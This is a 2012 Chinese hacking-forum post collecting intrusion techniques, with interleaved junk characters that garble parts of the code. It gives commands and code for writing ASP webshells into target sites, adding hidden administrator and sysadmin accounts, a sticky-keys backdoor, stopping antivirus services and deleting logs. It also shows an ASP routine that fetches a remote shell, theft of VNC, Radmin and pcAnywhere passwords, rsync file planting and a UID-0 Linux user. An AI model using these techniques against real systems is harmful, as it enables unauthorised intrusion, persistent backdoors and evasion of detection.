中国网络渗透测试联盟

标题: 渗透技巧总结 [打印本页]

---

作者: admin    时间: 2012-9-5 15:00
标题: 渗透技巧总结
旁站路径问题
1、读网站配置。
2、用以下VBS
On Error Resume Next
If (LCase(Right(WScript.Fullname,11))="wscript.exe") Then
        

Msgbox Space(12) & "IIS Virtual Web Viewer" & Space(12) & Chr(13) & Space(9) & "
5 Q8 B* [9 l! S8 K* u$ j
Usage:Cscript vWeb.vbs",4096,"Lilo"
        WScript.Quit
End If
Set ObjService=GetObject

("IIS://LocalHost/W3SVC")
For Each obj3w In objservice
        If IsNumeric(obj3w.Name)
2 a! }( Q/ Q8 W; Y8 ~! V3 `& _" q' y0 f
) A/ i! }$ ^: J4 qThen
3 O0 C( R2 y! v& B8 H8 \- O9 j                Set OService=GetObject("IIS://LocalHost/W3SVC/" & obj3w.Name)
         

       Set VDirObj = OService.GetObject("IIsWebVirtualDir", "ROOT")
                If Err

) \' V/ v( ?8 s$ x3 U9 n<> 0 Then WScript.Quit (1)
                WScript.Echo Chr(10) & "[" &

OService.ServerComment & "]"
                For Each Binds In OService.ServerBindings
     
1 v4 F& a% V! g& ]0 v. J
8 `0 G0 U. j2 P5 Y- K, n                   Web = "{ " & Replace(Binds,":"," } { ") & " }"
                        
6 b9 ]( `; H# Y* g
WScript.Echo Replace(Split(Replace(Web," ",""),"}{")(2),"}","")
                Next
6 r% i; J4 F# K3 P      
8 N+ e& g. X" [8 M# f* _5 j
% X6 s: K" v. B) ]         WScript.Echo "ath            : " & VDirObj.Path
        End If
Next
. i: k2 e! k. ~( A复制代码
3、iis_spy列举（注：需要支持ASPX，反IISSPY的方法：将activeds.dll，activeds.tlb降权）
4、得到目标站目录，不能直接跨的。通过echo  ^<%execute(request("cmd"))%^> >>X:\目标目录\X.asp 或者copy 脚本文件 X:\目标目录\X.asp  像目标目录写入webshell。或者还可以试试type命令.
  V+ g+ @3 N( D( f—————————————————————
, T" q# m! `1 w. y, g  |WordPress的平台，爆绝对路径的方法是：
url/wp-content/plugins/akismet/akismet.php
" K: W+ f( K" l0 `url/wp-content/plugins/akismet/hello.php
2 s2 y. V' A' J$ M) u+ U6 R) o: k——————————————————————
phpMyAdmin暴路径办法:
+ z9 h% i1 i8 R5 l' @$ xphpMyAdmin/libraries/select_lang.lib.php
phpMyAdmin/darkblue_orange/layout.inc.php
phpMyAdmin/index.php?lang[]=1
% G; ], q2 C* F/ @7 u8 Gphpmyadmin/themes/darkblue_orange/layout.inc.php
. Z0 n- f/ r% z( W' Q$ G0 ]————————————————————
网站可能目录(注：一般是虚拟主机类）
data/htdocs.网站/网站/
3 i/ n9 [! N  f" s2 \$ K* `( E0 ~————————————————————
$ N7 ^" y+ x# c+ d* @CMD下操作VPN相关
: c: X# y+ l' d9 e5 n3 dnetsh ras set user administrator permit #允许administrator拨入该VPN
/ ~# d2 H8 k* F, K$ ?2 \1 Tnetsh ras set user administrator deny #禁止administrator拨入该VPN
netsh ras show user #查看哪些用户可以拨入VPN
netsh ras ip show config #查看VPN分配IP的方式
netsh ras ip set addrassign method = pool #使用地址池的方式分配IP
netsh ras ip add range from = 192.168.3.1 to = 192.168.3.254 #地址池的范围是从192.168.3.1到192.168.3.254
————————————————————
命令行下添加SQL用户的方法
需要有管理员权限,在命令下先建立一个c:\test.qry文件,内容如下:
9 c& e+ `# c& a6 ^: s0 l; Sexec master.dbo.sp_addlogin test,123
EXEC sp_addsrvrolemember 'test, 'sysadmin'
然后在DOS下执行:cmd.exe /c isql -E /U alma /P /i c:\test.qry
  r  W& L7 f8 d, X! ~+ K
另类的加用户方法
在删掉了net.exe和不用adsi之外，新的加用户的方法。代码如下：
js:
$ h2 L- x! W1 evar o=new ActiveXObject( "Shell.Users" );
z=o.create("test") ;
+ |- s% o1 X# Q( t+ K2 {3 v( B2 f! xz.changePassword("123456","")
0 m" n2 r* T* q9 k3 Y4 R! mz.setting("AccountType")=3;

5 c  `+ ~# S- T( ?! Vvbs:
Set   o=CreateObject( "Shell.Users" )
Set z=o.create("test")
z.changePassword "123456",""
z.setting("AccountType")=3
3 S0 f2 f# _4 ]2 N% N2 u0 R——————————————————
& z7 p/ i# ~: wcmd访问控制权限控制（注：反everyone不可读，工具-文件夹选项-使用简单的共享去掉即可）

8 k3 f5 N* `3 \6 f/ x+ K0 p$ ~( F命令如下
+ A& q. \' ^. k. T% Bcacls c: /e /t /g everyone:F           #c盘everyone权限
9 d  I; y( M- `$ v) ^, ]cacls "目录" /d everyone               #everyone不可读，包括admin
. C' x% T8 }' |————————以下配合PR更好————
3389相关
a、防火墙TCP/IP筛选.（关闭net stop policyagent & net stop sharedaccess）
9 ~& S, e8 {5 t/ {5 _b、内网环境（LCX）
c、终端服务器超出了最大允许连接
# l9 C% @' u. a2 uXP 运行mstsc /admin
: b% O' n$ x( ]3 e; i2003 运行mstsc /console   

杀软关闭（把杀软所在的文件的所有权限去掉）
处理变态诺顿企业版：
* E4 Z0 M4 n9 E4 Rnet stop "Symantec AntiVirus" /y
net stop "Symantec AntiVirus Definition Watcher" /y
net stop "Symantec Event Manager" /y
net stop "System Event Notification" /y
8 P5 {% A) _* E9 G' p/ Xnet stop "Symantec Settings Manager" /y

卖咖啡：net stop "McAfee McShield"
  H7 a( {- c1 c, J————————————————————

5次SHIFT：
copy %systemroot%\system32\sethc.exe %systemroot%\system32\dllcache\sethc1.exe
( a, Y8 [: H* ^/ A7 E  ccopy %systemroot%\system32\cmd.exe %systemroot%\system32\dllcache\sethc.exe /y
$ \4 g2 V% `6 b5 ]copy %systemroot%\system32\cmd.exe %systemroot%\system32\sethc.exe /y
——————————————————————
隐藏账号添加：
6 H9 e6 ^4 a; }1、net user admin$ 123456 /add&net localgroup administrators admin$ /add
$ h3 I" j' Q0 \0 a9 s- O2、导出注册表SAM下用户的两个键值
3、在用户管理界面里的admin$删除，然后把备份的注册表导回去。
3 F7 W# @8 x* D8 o& a+ O4、利用Hacker Defender把相关用户注册表隐藏
——————————————————————
+ M* `7 ]6 w9 MMSSQL扩展后门：
7 {: {# R1 g# @5 N  h: PUSE master;
EXEC sp_addextendedproc 'xp_helpsystem', 'xp_helpsystem.dll';
GRANT exec On xp_helpsystem TO public;
$ U; @; P+ W/ @# N- L' I, `———————————————————————
日志处理
0 L7 A; c7 x7 w; m0 d! pC:\WINNT\system32\LogFiles\MSFTPSVC1>下有
ex011120.log / ex011121.log / ex011124.log三个文件，
0 Z6 \9 {& H7 P) I直接删除 ex0111124.log
0 a, l; O5 T, _; Y/ o0 P0 J不成功，“原文件...正在使用”
% T% g" R# G, }- E当然可以直接删除ex011120.log / ex011121.log
8 Z7 u( ^$ [# ]% M: [6 J) C用记事本打开ex0111124.log，删除里面的一些内容后，保存，覆盖退出，成功。
- a; f6 C6 O. m8 T& a当停止msftpsvc服务后可直接删除ex011124.log

MSSQL查询分析器连接记录清除：
3 _& a. X$ Y! G' uMSSQL 2000位于注册表如下：
8 x  H5 N- f5 g1 U% wHKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers
$ e. F: o  y. U# c: z找到接接过的信息删除。
MSSQL 2005是在C:\Documents and Settings\<user>\Application Data\Microsoft\Microsoft SQL

; o5 X. p9 r7 L( s$ n" FServer\90\Tools\Shell\mru.dat
& G3 v! @  R* ^! n. G7 |" `* Q—————————————————————————
  t3 R# D& L5 s防BT系统拦截可使用远程下载shell，也达到了隐藏自身的效果，也可以做为超隐蔽的后门，神马的免杀webshell，用服务器安全工具一扫通通挂掉了）

1 l8 _& N& n2 o8 W$ c: w2 p<%
! F2 o# Y/ k) l! W; t( YSub eWebEditor_SaveRemoteFile(s_LocalFileName,s_RemoteFileUrl)
Dim Ads, Retrieval, GetRemoteData
On Error Resume Next
Set Retrieval = Server.CreateObject("Microsoft.XMLHTTP")
With Retrieval
& ]+ P" I9 N" n4 o, v& |' p' j.Open "Get", s_RemoteFileUrl, False, "", ""
.Send
- Y- G, N/ F4 J3 h. m! y8 K$ y, ^, MGetRemoteData = .ResponseBody
End With
' v/ Z, L. s* a+ m+ X5 S9 [) q0 CSet Retrieval = Nothing
Set Ads = Server.CreateObject("Adodb.Stream")
With Ads
.Type = 1
.Open
.Write GetRemoteData
.SaveToFile Server.MapPath(s_LocalFileName), 2
+ |! m* O5 R! D" [2 n* T& K$ N.Cancel()
.Close()
" z9 @9 k+ t5 y$ @0 HEnd With
* b2 b0 g6 i$ q" @Set Ads=nothing
! U% K: L, H4 [6 zEnd Sub
: k* L- ~* {4 t: G0 h( c
eWebEditor_SaveRemoteFile"your shell's name","your shell'urL"
%>

VNC提权方法:
利用shell读取vnc保存在注册表中的密文，使用工具VNC4X破解
- M' {9 m' t" j, ~3 s注册表位置：HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4\password
; C  t) u, e6 c2 i2 S& r0 \7 }( nregedit -e c:\reg.dll "HKEY_LOCAL_MACHINE\SOFTWARE\ORL"
5 [5 j' r, W: G& z) F  ~regedit -e c:\reg.dll "HKEY_LOCAL_MACHINE\Software\RealVNC\WinVNC4"
Radmin 默认端口是4899，
+ T( K# ~6 b6 l% j+ Z6 O) _HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\Parameter//默认密码注册表位置
% n( p; }% v/ Q/ q# U2 ^/ ?4 t, [HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\Port //默认端口注册表位置
! ]0 g; Y2 y, q然后用HASH版连接。
如果我们拿到一台主机的WEBSEHLL。通过查找发现其上安装有PCANYWHERE 同时保存密码文件的目录是允许我们的IUSER权限访问，我们可以下载这个CIF文件到本地破解，再通过PCANYWHERE从本机登陆服务器。
保存密码的CIF文件,不是位于PCANYWHERE的安装目录,而且位于安装PCANYWHERE所安装盘的\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\ 如果PCANYWHERE安装在D:\program\文件下下，那么PCANYWHERE的密码文件就保存在D:\Documents and Settings\All
Users\Application Data\Symantec\pcAnywhere\文件夹下。
——————————————————————
搜狗输入法的PinyinUp.exe是可读可写的直接替换即可
——————————————————----------
WinWebMail目录下的web必须设置everyone权限可读可写，在开始程序里，找到WinWebMail快捷方式下下
' K! N" b4 y- z* D/ W  G& n来，看路径，访问 路径\web传shell，访问shell后，权限是system，放远控进启动项，等待下次重启。
没有删cmd组建的直接加用户。
7i24的web目录也是可写，权限为administrator。
5 U3 e& p- U; p& N( R4 r5 u) X
1433 SA点构建注入点。
<%
strSQLServerName = "服务器ip"
4 b7 X8 A6 E* e" ystrSQLDBUserName = "数据库帐号"
' ?% X4 t" u- X/ \" g9 TstrSQLDBPassword = "数据库密码"
$ E9 F, j3 L& JstrSQLDBName = "数据库名称"
0 @3 R, ^9 e0 [+ fSet conn = Server.createObject("ADODB.Connection")
& j( e2 i7 m$ r& Y2 ^4 jstrCon = "rovider=SQLOLEDB.1ersist Security Info=False;Server=" & strSQLServerName &

";User ID=" & strSQLDBUserName & "assword=" & strSQLDBPassword & ";Database=" &

& K" P: ]& R! d# h+ f7 \1 c- d5 ^strSQLDBName & ";"
, o$ t" R  L" }5 D8 i+ {conn.open strCon
0 n3 O+ y: [$ x' l' W/ r6 sdim rs,strSQL,id
set rs=server.createobject("ADODB.recordset")
id = request("id")
strSQL = "select * from ACTLIST where worldid=" & idrs.open strSQL,conn,1,3
' m7 }* O5 H, ?( ]  hrs.close
%>
. H& h9 C9 M: b  c" e复制代码
0 @5 A$ E% f" X: [******liunx 相关******
一.ldap渗透技巧
1.cat /etc/nsswitch
& z. Z) Q6 X+ A% C8 e, o看看密码登录策略我们可以看到使用了file ldap模式

# Z9 R! A" t, b$ f$ B- g. A2.less /etc/ldap.conf
9 ]  }1 G" C; h3 W* v6 n. Zbase ou=People,dc=unix-center,dc=net
找到ou,dc,dc设置
5 A4 w$ X" B; |3 \& h+ x
; l/ I1 Y6 o4 R( l( b5 z3.查找管理员信息
- F  R# A: |9 x* C' }匿名方式
ldapsearch -x -D "cn=administrator,cn=People,dc=unix-center,dc=net" -b

"cn=administrator,cn=People,dc=unix-center,dc=net" -h 192.168.2.2
有密码形式
; Y9 X7 z/ A; |ldapsearch -x -W -D "cn=administrator,cn=People,dc=unix-center,dc=net" -b

"cn=administrator,cn=People,dc=unix-center,dc=net" -h 192.168.2.2


) @$ R, s$ U5 z* q2 _4.查找10条用户记录
ldapsearch -h 192.168.2.2 -x -z 10 -p 指定端口
2 _3 U: \1 r1 G$ R* Z5 j7 J
实战:
7 N' J! D' f: ~+ B$ V1.cat /etc/nsswitch
0 v, o7 y6 d" S0 z& f( y+ U% V看看密码登录策略我们可以看到使用了file ldap模式

6 T  Y$ o* y  F4 R# k2 c2.less /etc/ldap.conf
base ou=People,dc=unix-center,dc=net
/ ?- m7 E# ^0 f2 |: y  B0 c6 P找到ou,dc,dc设置
  g- W1 }' \8 s; O
3.查找管理员信息
) d' O3 M; H, B# R, Y, T匿名方式
# L# d" V5 X3 o/ b" p1 Q1 Dldapsearch -x -D "cn=administrator,cn=People,dc=unix-center,dc=net" -b

"cn=administrator,cn=People,dc=unix-center,dc=net" -h 192.168.2.2
; P1 x" n% R4 `9 G# X- q有密码形式
ldapsearch -x -W -D "cn=administrator,cn=People,dc=unix-center,dc=net" -b

"cn=administrator,cn=People,dc=unix-center,dc=net" -h 192.168.2.2


4.查找10条用户记录
  r$ d& h" I6 y$ Ildapsearch -h 192.168.2.2 -x -z 10 -p 指定端口
- s% [, L+ t5 m# N: K
' s9 E: b- |% S9 t7 D9 l渗透实战:
1.返回所有的属性
ldapsearch -h 192.168.7.33 -b "dc=ruc,dc=edu,dc=cn" -s sub "objectclass=*"
version: 1
dn: dc=ruc,dc=edu,dc=cn
dc: ruc
, [) ^  W# o2 X* GobjectClass: domain

dn: uid=manager,dc=ruc,dc=edu,dc=cn
uid: manager
2 j! Z3 Z- h$ t" ?objectClass: inetOrgPerson
$ s" |8 i% ]. g9 N* t- P! W' tobjectClass: organizationalPerson
0 q; E* k( c/ i; G  d( G' @objectClass: person
7 \6 e  G1 A6 F0 p8 fobjectClass: top
sn: manager
3 ^2 C0 k8 u  t( \; gcn: manager
& Z" c* ^. r  t& u5 {2 Z7 ?8 I' H* r
dn: uid=superadmin,dc=ruc,dc=edu,dc=cn
: {: g" }- _; V* s6 @* i8 Nuid: superadmin
objectClass: inetOrgPerson
, I" J* ?1 ?/ d0 I9 aobjectClass: organizationalPerson
8 N7 _1 N. R" f; t! Y6 ]$ TobjectClass: person
1 W0 ~4 J' k; QobjectClass: top
sn: superadmin
! P9 m- `# D( p  s  K* wcn: superadmin

" ]: L" I4 ^. K4 Vdn: uid=admin,dc=ruc,dc=edu,dc=cn
$ `" ]8 d" \4 `! g, v5 @4 @. c9 huid: admin
" ^2 f7 M: R1 d# `  m" g. a0 {objectClass: inetOrgPerson
objectClass: organizationalPerson
objectClass: person
objectClass: top
' S2 j, I- o1 e* O9 m- Esn: admin
cn: admin

0 t) {7 L7 I9 D6 }; C5 ndn: uid=dcp_anonymous,dc=ruc,dc=edu,dc=cn
uid: dcp_anonymous
" A6 y5 W1 |; |( |objectClass: top
1 v! h, f! `) V; o- kobjectClass: person
0 z7 G8 J" i  t0 jobjectClass: organizationalPerson
3 k- i; `  X5 x3 i5 G, JobjectClass: inetOrgPerson
& f3 ~8 c7 R- c# @2 L% ]: N  K* W, Zsn: dcp_anonymous
cn: dcp_anonymous

2.查看基类
bash-3.00# ldapsearch -h 192.168.7.33 -b "dc=ruc,dc=edu,dc=cn" -s base "objectclass=*" |

- m, @" {/ w% u8 p5 L5 m/ J' v* x6 Ymore
5 e: ~8 A6 p8 ~2 r, P1 L1 U! Y# Yversion: 1
dn: dc=ruc,dc=edu,dc=cn
dc: ruc
$ G3 L/ U, m: k8 N( C6 D+ a- Z9 L8 f4 fobjectClass: domain

3.查找
( l7 j8 q. X2 N5 w# kbash-3.00# ldapsearch -h 192.168.7.33 -b "" -s base "objectclass=*"
version: 1
: j& ], v; j; Q' K# g6 Ldn:
4 P  x9 i) D4 \  W) u' c* ~objectClass: top
namingContexts: dc=ruc,dc=edu,dc=cn
supportedExtension: 2.16.840.1.113730.3.5.7
supportedExtension: 2.16.840.1.113730.3.5.8
supportedExtension: 1.3.6.1.4.1.4203.1.11.1
' K& y4 [/ ]* u$ U, y1 dsupportedExtension: 1.3.6.1.4.1.42.2.27.9.6.25
; x! V9 g/ u# j! G9 E+ t  I: E3 rsupportedExtension: 2.16.840.1.113730.3.5.3
# ~, b1 I  m: F2 E4 P$ e% U& l& WsupportedExtension: 2.16.840.1.113730.3.5.5
3 A6 Z9 a( @. d- P' F; _supportedExtension: 2.16.840.1.113730.3.5.6
& o1 N' @. @* C2 WsupportedExtension: 2.16.840.1.113730.3.5.4
+ Q& H7 p- t$ I/ z, B6 i) y, XsupportedExtension: 1.3.6.1.4.1.42.2.27.9.6.1
0 ~: N0 _* ?; j! B: n9 CsupportedExtension: 1.3.6.1.4.1.42.2.27.9.6.2
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.3
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.4
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.5
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.6
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.7
+ n; W: ^( T" fsupportedExtension: 1.3.6.1.4.1.42.2.27.9.6.8
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.9
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.23
# a* v" k6 B  E# \; @( k$ ^supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.11
* a3 A+ i6 S/ w7 d( @. hsupportedExtension: 1.3.6.1.4.1.42.2.27.9.6.12
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.13
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.14
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.15
7 v' s  R$ V$ v1 {" gsupportedExtension: 1.3.6.1.4.1.42.2.27.9.6.16
! f( Y4 z, w+ o8 G$ ]( N* qsupportedExtension: 1.3.6.1.4.1.42.2.27.9.6.17
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.18
, Z% v& [& h# d) X1 qsupportedExtension: 1.3.6.1.4.1.42.2.27.9.6.19
8 y: G# p& c$ x) \& H+ T; r, HsupportedExtension: 1.3.6.1.4.1.42.2.27.9.6.21
, x: C$ a2 T" Z6 ?/ D+ S1 DsupportedExtension: 1.3.6.1.4.1.42.2.27.9.6.22
8 D: u. I! _0 \3 rsupportedExtension: 1.3.6.1.4.1.42.2.27.9.6.24
/ C2 s: E" i: I; n  r; DsupportedExtension: 1.3.6.1.4.1.1466.20037
1 {+ F% x* y6 a0 l; OsupportedExtension: 1.3.6.1.4.1.4203.1.11.3
/ b# M9 p( i0 W# hsupportedControl: 2.16.840.1.113730.3.4.2
supportedControl: 2.16.840.1.113730.3.4.3
supportedControl: 2.16.840.1.113730.3.4.4
supportedControl: 2.16.840.1.113730.3.4.5
% }' i2 E- b; t0 ?supportedControl: 1.2.840.113556.1.4.473
supportedControl: 2.16.840.1.113730.3.4.9
/ t6 V. H/ H3 psupportedControl: 2.16.840.1.113730.3.4.16
supportedControl: 2.16.840.1.113730.3.4.15
; i9 g% y5 b; C' `' m, gsupportedControl: 2.16.840.1.113730.3.4.17
& c) w/ S. S' |+ @6 D2 k/ {( [) tsupportedControl: 2.16.840.1.113730.3.4.19
supportedControl: 1.3.6.1.4.1.42.2.27.9.5.2
supportedControl: 1.3.6.1.4.1.42.2.27.9.5.6
supportedControl: 1.3.6.1.4.1.42.2.27.9.5.8
supportedControl: 1.3.6.1.4.1.42.2.27.8.5.1
1 S1 B& E# ~1 P7 j! y6 y( d4 Q; RsupportedControl: 1.3.6.1.4.1.42.2.27.8.5.1
supportedControl: 2.16.840.1.113730.3.4.14
3 \0 u; A! s8 o1 j) @2 G6 EsupportedControl: 1.3.6.1.4.1.1466.29539.12
supportedControl: 2.16.840.1.113730.3.4.12
+ j; B/ M; t' B# Z9 z# rsupportedControl: 2.16.840.1.113730.3.4.18
; ]1 ~8 I7 L; Z6 ]supportedControl: 2.16.840.1.113730.3.4.13
) D1 d: ?" k. x: A. h2 _4 O" osupportedSASLMechanisms: EXTERNAL
supportedSASLMechanisms: DIGEST-MD5
1 R0 B4 ]) j) G9 A0 |9 v+ q0 zsupportedLDAPVersion: 2
' ~# n) d+ |4 X8 O% ?6 ksupportedLDAPVersion: 3
) }9 k/ R0 `9 M9 Q% n8 NvendorName: Sun Microsystems, Inc.
vendorVersion: Sun-Java(tm)-System-Directory/6.2
dataversion: 020090516011411
netscapemdsuffix: cn=ldap://dc=webA:389
supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA
supportedSSLCiphers: TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA
supportedSSLCiphers: TLS_DHE_RSA_WITH_AES_256_CBC_SHA
supportedSSLCiphers: TLS_DHE_DSS_WITH_AES_256_CBC_SHA
  q; Y" m8 G* `/ NsupportedSSLCiphers: TLS_ECDH_RSA_WITH_AES_256_CBC_SHA
4 ?1 A6 Z3 `, \supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_AES_256_CBC_SHA
- t3 C9 Y4 j9 y' b2 l) OsupportedSSLCiphers: TLS_RSA_WITH_AES_256_CBC_SHA
4 L4 c# v$ B6 {7 TsupportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_RC4_128_SHA
supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA
0 N8 s4 X+ R" x0 H6 {supportedSSLCiphers: TLS_ECDHE_RSA_WITH_RC4_128_SHA
supportedSSLCiphers: TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA
' y. w% j8 n, QsupportedSSLCiphers: TLS_DHE_DSS_WITH_RC4_128_SHA
supportedSSLCiphers: TLS_DHE_RSA_WITH_AES_128_CBC_SHA
supportedSSLCiphers: TLS_DHE_DSS_WITH_AES_128_CBC_SHA
supportedSSLCiphers: TLS_ECDH_RSA_WITH_RC4_128_SHA
3 h* o$ |$ i( G' k+ ^, }( ksupportedSSLCiphers: TLS_ECDH_RSA_WITH_AES_128_CBC_SHA
supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_RC4_128_SHA
supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_AES_128_CBC_SHA
supportedSSLCiphers: SSL_RSA_WITH_RC4_128_MD5
$ D3 q! ]" l" ysupportedSSLCiphers: SSL_RSA_WITH_RC4_128_SHA
  X% _9 J& r1 d2 _9 V6 c5 F* d+ hsupportedSSLCiphers: TLS_RSA_WITH_AES_128_CBC_SHA
4 |) A8 @/ g; a- a5 b! PsupportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_3DES_EDE_CBC_SHA
supportedSSLCiphers: TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA
supportedSSLCiphers: SSL_DHE_RSA_WITH_3DES_EDE_CBC_SHA
supportedSSLCiphers: SSL_DHE_DSS_WITH_3DES_EDE_CBC_SHA
supportedSSLCiphers: TLS_ECDH_RSA_WITH_3DES_EDE_CBC_SHA
supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_3DES_EDE_CBC_SHA
supportedSSLCiphers: SSL_RSA_FIPS_WITH_3DES_EDE_CBC_SHA
% B3 ?) @; S9 n( BsupportedSSLCiphers: SSL_RSA_WITH_3DES_EDE_CBC_SHA
0 J0 T0 @9 ?" E. Y! r# NsupportedSSLCiphers: SSL_DHE_RSA_WITH_DES_CBC_SHA
4 b) w: t. i/ n" l% |- msupportedSSLCiphers: SSL_DHE_DSS_WITH_DES_CBC_SHA
supportedSSLCiphers: SSL_RSA_FIPS_WITH_DES_CBC_SHA
, |3 x! {9 C9 p7 p! [7 X5 c' BsupportedSSLCiphers: SSL_RSA_WITH_DES_CBC_SHA
( P: J6 D, @. {1 @7 W& s; LsupportedSSLCiphers: TLS_RSA_EXPORT1024_WITH_RC4_56_SHA
supportedSSLCiphers: TLS_RSA_EXPORT1024_WITH_DES_CBC_SHA
supportedSSLCiphers: SSL_RSA_EXPORT_WITH_RC4_40_MD5
supportedSSLCiphers: SSL_RSA_EXPORT_WITH_RC2_CBC_40_MD5
supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_NULL_SHA
supportedSSLCiphers: TLS_ECDHE_RSA_WITH_NULL_SHA
supportedSSLCiphers: TLS_ECDH_RSA_WITH_NULL_SHA
; W6 }* ]0 o3 P9 R6 csupportedSSLCiphers: TLS_ECDH_ECDSA_WITH_NULL_SHA
/ f! d5 f4 V" d9 m  `' TsupportedSSLCiphers: SSL_RSA_WITH_NULL_SHA
( G2 o+ m) ^! f& FsupportedSSLCiphers: SSL_RSA_WITH_NULL_MD5
supportedSSLCiphers: SSL_CK_RC4_128_WITH_MD5
supportedSSLCiphers: SSL_CK_RC2_128_CBC_WITH_MD5
2 g% g% R5 h/ H- ?. AsupportedSSLCiphers: SSL_CK_DES_192_EDE3_CBC_WITH_MD5
supportedSSLCiphers: SSL_CK_DES_64_CBC_WITH_MD5
% l& y1 f% h1 LsupportedSSLCiphers: SSL_CK_RC4_128_EXPORT40_WITH_MD5
+ e& u5 E4 @/ P! {4 q4 V. s+ r( KsupportedSSLCiphers: SSL_CK_RC2_128_CBC_EXPORT40_WITH_MD5
, e3 U: O# l8 T  A————————————
2. NFS渗透技巧
showmount -e ip
列举IP
, X5 e1 k$ [6 p- b——————
5 }5 D! p+ O6 K3 [# a8 P3.rsync渗透技巧
1.查看rsync服务器上的列表
. z" ]3 g4 D/ v9 g+ r4 D( Wrsync 210.51.X.X::
finance
" w6 D5 f4 E5 x& B. Wimg_finance
: N. E& z$ y: f9 hauto
img_auto
2 W7 `! V1 `+ N% d2 Whtml_cms
5 W2 a+ Q# Y: i5 n5 W2 m. d: nimg_cms
ent_cms
ent_img
  w5 q; H5 D2 y, u# q$ Q) V  wceshi
res_img
res_img_c2
  V6 a" b8 D/ A" |! hchip
& ^: y# \/ W6 C: u& Kchip_c2
ent_icms
games
# x# d2 E. A0 e8 sgamesimg
* I4 Y. k" t/ P: z7 b' smedia
! r4 _0 l" o" Hmediaimg
: `, S. O: {7 Yfashion
res-fashion
/ ]# n  r: H" v, u2 w! X( v6 Ires-fo
  N$ {/ {9 X+ B$ X' T5 htaobao-home
res-taobao-home
; Q2 f* V7 _. o! R: _house
9 i. L( V! @- H0 ~/ R. ?8 sres-house
7 {' _$ z' x* |5 ?# ^res-home
$ u& W. [* ^/ @res-edu
  N6 Q* T% c  ~res-ent
res-labs
/ K$ u8 }9 X  r; p7 Ores-news
res-phtv
res-media
- C: K& l3 k7 M5 N& Dhome
edu
news
res-book
# j0 w! }/ d2 ^5 j+ p
看相应的下级目录(注意一定要在目录后面添加上/)
0 B1 N" D6 O% V

2 o9 z$ V' |, p" `rsync 210.51.X.X::htdocs_app/
/ h) ]1 ^( c! w4 s0 z2 P# r! H+ Mrsync 210.51.X.X::auto/
# ~- V# {# s( d/ g4 }rsync 210.51.X.X::edu/
* C3 t& _) b8 @  _
; i7 g6 U! ~$ U6 U8 E2.下载rsync服务器上的配置文件
( o- K5 ^" n% Z; q- Trsync -avz 210.51.X.X::htdocs_app/ /tmp/app/

; ^' W+ K8 }5 Y5 Y1 K) P3.向上更新rsync文件(成功上传,不会覆盖)
rsync -avz nothack.php 210.51.X.X::htdocs_app/warn/
2 e2 A% T; P0 B' |# O& {& c% Nhttp://app.finance.xxx.com/warn/nothack.txt
; [' n0 Z4 U/ T- D1 {* u
" H6 r8 i7 g, \- u. V6 o四.squid渗透技巧
6 G, F8 k8 t/ @nc -vv baidu.com 80
GET HTTP://www.sina.com / HTTP/1.0
GET HTTP://WWW.sina.com:22 / HTTP/1.0
五.SSH端口转发
0 _+ G2 E% _2 p7 `: N; s/ q  Pssh -C -f -N -g -R 44:127.0.0.1:22 cnbird@ip

4 _3 _. G& @3 v6 }" D! d- e$ L$ a; Q六.joomla渗透小技巧
确定版本
4 E9 r/ j. k9 e) @% nindex.php?option=com_content&view=article&id=30:what-languages-are-supported-by-joomla-
3 l! S  |0 @$ z- W4 W5 F/ z$ _8 Z
15&catid=32:languages&Itemid=47
7 ]: c# p" J5 k( W4 \+ t1 b
$ F# \2 n1 O3 P% z) O  y重新设置密码
index.php?option=com_user&view=reset&layout=confirm

七: Linux添加UID为0的root用户
! X6 H2 M5 ]( a7 q+ H. Cuseradd -o -u 0 nothack

八.freebsd本地提权
% s( f1 v% W3 i# `1 y2 n) [[argp@julius ~]$ uname -rsi
* freebsd 7.3-RELEASE GENERIC
; N5 }0 l" N- }8 [3 H2 T- q+ e* [argp@julius ~]$ sysctl vfs.usermount
* vfs.usermount: 1
* [argp@julius ~]$ id
3 g2 J, K0 \6 {" l2 ^$ Y* s, F$ g* uid=1001(argp) gid=1001(argp) groups=1001(argp)
* L" r5 q- L3 p4 P3 x4 j* [argp@julius ~]$ gcc -Wall nfs_mount_ex.c -o nfs_mount_ex
# N/ i: d) l) v; W% Y2 q/ ^* [argp@julius ~]$ ./nfs_mount_ex
2 u/ D3 j. z! A" j9 E*
5 R$ d7 q- u: ^. |$ @, Mcalling nmount()
4 F0 j. J% M0 N# n
) {8 s1 M% H. j! y% N2 W3 ^, F' ^（注：本文原件由0x童鞋收集整理，感谢0x童鞋，本人补充和优化了点，本文毫无逻辑可言，因为是想到什么就写了，大家见谅）
1 y( j3 U  u9 R( l——————————————
3 J, h, |' A" q$ M感谢T00LS的童鞋们踊跃交流，让我学到许多经验，为了方便其他童鞋浏览，将T00LS的童鞋们补充的贴在下面，同时我也会以后将自己的一些想法跟新在后面。
